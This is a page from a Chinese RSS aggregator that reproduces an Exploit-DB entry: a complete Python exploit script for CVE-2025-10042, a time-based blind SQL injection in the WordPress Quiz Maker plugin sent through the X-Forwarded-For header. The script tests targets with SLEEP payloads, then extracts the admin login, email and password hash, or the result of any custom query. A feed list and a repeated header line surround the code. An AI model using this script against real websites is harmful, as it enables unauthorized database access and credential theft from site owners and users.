惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

T
Tenable Blog
MyScale Blog
MyScale Blog
罗磊的独立博客
Hugging Face - Blog
Hugging Face - Blog
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
爱范儿
爱范儿
博客园 - 司徒正美
D
Darknet – Hacking Tools, Hacker News & Cyber Security
量子位
N
News | PayPal Newsroom
S
Secure Thoughts
酷 壳 – CoolShell
酷 壳 – CoolShell
L
LINUX DO - 热门话题
有赞技术团队
有赞技术团队
V
Visual Studio Blog
T
Tailwind CSS Blog
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
Project Zero
Project Zero
B
Blog RSS Feed
J
Java Code Geeks
Google Online Security Blog
Google Online Security Blog
Last Week in AI
Last Week in AI
Cyberwarzone
Cyberwarzone
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
小众软件
小众软件
博客园 - 【当耐特】
Latest news
Latest news
T
Threat Research - Cisco Blogs
aimingoo的专栏
aimingoo的专栏
博客园_首页
博客园 - 三生石上(FineUI控件)
Engineering at Meta
Engineering at Meta
D
Docker
Forbes - Security
Forbes - Security
Help Net Security
Help Net Security
Apple Machine Learning Research
Apple Machine Learning Research
P
Proofpoint News Feed
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
Simon Willison's Weblog
Simon Willison's Weblog
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
V2EX - 技术
V2EX - 技术
N
Netflix TechBlog - Medium
The Last Watchdog
The Last Watchdog
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
T
Threatpost
Cloudbric
Cloudbric
T
The Exploit Database - CXSecurity.com
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
博客园 - 叶小钗
Webroot Blog
Webroot Blog

Exploit-DB.com RSS Feed

MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive
OffSec’s Exploit Database Archive
Rahul Sreenivasan · 2025-12-25 · via Exploit-DB.com RSS Feed

WordPress Quiz Maker 6.7.0.56 - SQL Injection

# Exploit Title: WordPress Quiz Maker 6.7.0.56 - SQL Injection
# Date: 2025-12-16
# Exploit Author: Rahul Sreenivasan (Tr0j4n)
# Vendor Homepage: https://ays-pro.com/wordpress/quiz-maker
# Software Link: https://wordpress.org/plugins/quiz-maker/
# Version: <= 6.7.0.56
# Tested on: WordPress 6.x with Quiz Maker 6.7.0.56 on Ubuntu/Nginx/PHP-FPM
# CVE: CVE-2025-10042

from argparse import ArgumentParser
from requests import get
from requests.packages.urllib3 import disable_warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from time import time
from sys import exit

disable_warnings(InsecureRequestWarning)

CHARSET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-@.!$/:?"

def send_payload(url, path, header, payload, timeout):
    target = f"{url.rstrip('/')}/{path.lstrip('/')}"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        header: payload
    }
    try:
        start = time()
        get(target, headers=headers, timeout=timeout, verify=False)
        return time() - start
    except:
        return timeout

def check_vulnerable(url, path, header, sleep_time, timeout):
    print("[*] Testing for SQL injection vulnerability...")
    
    baseline = send_payload(url, path, header, "127.0.0.1", timeout)
    print(f"[*] Baseline response time: {baseline:.2f}s")
    
    payload = f"1' OR SLEEP({sleep_time})#"
    injection = send_payload(url, path, header, payload, timeout)
    print(f"[*] Injection response time: {injection:.2f}s")
    
    if injection >= sleep_time * 0.7:
        print("[+] Target is VULNERABLE!")
        return True
    else:
        print("[-] Target does not appear to be vulnerable.")
        return False

def extract_length(url, path, header, query, timeout):
    low, high = 1, 100
    
    while low < high:
        mid = (low + high) // 2
        payload = f"1' OR IF(LENGTH(({query}))>{mid},SLEEP(1),0)#"
        elapsed = send_payload(url, path, header, payload, timeout)
        
        if elapsed >= 0.8:
            low = mid + 1
        else:
            high = mid
    
    return low

def extract_char(url, path, header, query, position, timeout):
    low, high = 32, 126
    
    while low < high:
        mid = (low + high) // 2
        payload = f"1' OR IF(ASCII(SUBSTRING(({query}),{position},1))>{mid},SLEEP(1),0)#"
        elapsed = send_payload(url, path, header, payload, timeout)
        
        if elapsed >= 0.8:
            low = mid + 1
        else:
            high = mid
    
    return chr(low) if low <= 126 else "?"

def extract_data(url, path, header, query, timeout):
    length = extract_length(url, path, header, query, timeout)
    print(f"[*] Data length: {length}")
    
    result = ""
    for i in range(1, length + 1):
        char = extract_char(url, path, header, query, i, timeout)
        result += char
        print(f"\r[*] Extracting: {result}", end="", flush=True)
    
    print()
    return result

def dump_users(url, path, header, timeout):
    print("\n[*] Extracting WordPress admin users...")
    
    # Get admin user login
    query = "SELECT user_login FROM wp_users WHERE ID=1"
    username = extract_data(url, path, header, query, timeout)
    print(f"[+] Username: {username}")
    
    # Get admin email
    query = "SELECT user_email FROM wp_users WHERE ID=1"
    email = extract_data(url, path, header, query, timeout)
    print(f"[+] Email: {email}")
    
    # Get password hash
    query = "SELECT user_pass FROM wp_users WHERE ID=1"
    password = extract_data(url, path, header, query, timeout)
    print(f"[+] Password Hash: {password}")
    
    return username, email, password

def main():
    parser = ArgumentParser(description="WordPress Quiz Maker SQLi Exploit (CVE-2025-10042)")
    parser.add_argument("-u", "--url", required=True, help="Target WordPress URL")
    parser.add_argument("-p", "--path", required=True, help="Path to quiz page")
    parser.add_argument("-H", "--header", default="X-Forwarded-For", help="Header for injection")
    parser.add_argument("-t", "--timeout", type=int, default=10, help="Request timeout")
    parser.add_argument("--check", action="store_true", help="Only check vulnerability")
    parser.add_argument("--dump", action="store_true", help="Dump admin credentials")
    parser.add_argument("--query", help="Custom SQL query to extract")
    args = parser.parse_args()
    
    print("[+] WordPress Quiz Maker SQLi Exploit (CVE-2025-10042)")
    print(f"[+] Target: {args.url}")
    
    if not check_vulnerable(args.url, args.path, args.header, 3, args.timeout):
        exit(1)
    
    if args.check:
        exit(0)
    
    if args.dump:
        dump_users(args.url, args.path, args.header, args.timeout)
    elif args.query:
        print(f"\n[*] Executing custom query: {args.query}")
        result = extract_data(args.url, args.path, args.header, args.query, args.timeout)
        print(f"[+] Result: {result}")
    else:
        dump_users(args.url, args.path, args.header, args.timeout)

if __name__ == "__main__":
    main()